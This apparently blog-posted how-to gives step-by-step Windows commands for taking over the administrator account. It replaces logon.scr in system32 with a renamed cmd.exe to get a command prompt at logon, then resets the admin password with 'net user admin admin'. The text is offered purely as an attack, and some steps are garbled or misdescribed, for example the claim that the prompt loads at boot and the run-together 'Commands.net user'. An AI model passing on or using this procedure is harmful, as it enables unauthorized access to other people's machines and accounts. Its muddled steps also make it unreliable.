Hack the Administrator Password
1. Open Dos Prompt.
2. Do the following steps :
- cd\ Drops to root
- cd\windows\system32 Directs to the system32 dir
- mkdir temphack Creates the folder temphack
- copy logon.scr temphack\logon.scr Backsup logon.scr
- copy cmd.exe temphack\cmd.exe Backsup cmd.exe
- del logon.scr Deletes original logon.scr
- rename cmd.exe logon.scr Renames cmd.exe to logon.scr
- exit Quits DOS
3. Restart the Machine and when the OS loaded it will load the DOS-Prompt
4. Use the Following Commands.net user admin admin
5. It will set the system Admin as Username and admin as your new Password with the Admnistrator Rights.
6. Copy the contents of temphack and back into the system32 directory.
7. Reboot.
0 comments:
Post a Comment